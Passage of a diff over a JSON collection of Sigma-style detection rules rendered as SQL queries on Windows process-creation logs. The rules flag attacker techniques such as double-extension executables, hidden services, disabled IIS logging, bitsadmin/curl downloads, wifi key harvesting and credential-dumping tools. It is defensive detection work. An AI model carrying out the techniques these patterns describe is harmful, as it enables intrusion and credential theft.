"id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "status": "stable", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": 
"Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine 
LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' 
ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView 
execution", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "attack.execution", + "attack.t1059" ], - "filename": "proc_creation_win_lolbin_tracker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND 
CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" - ], + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR 
CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": 
"proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "status": "experimental", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR 
NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", "status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + 
"attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "attack.t1059.001" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
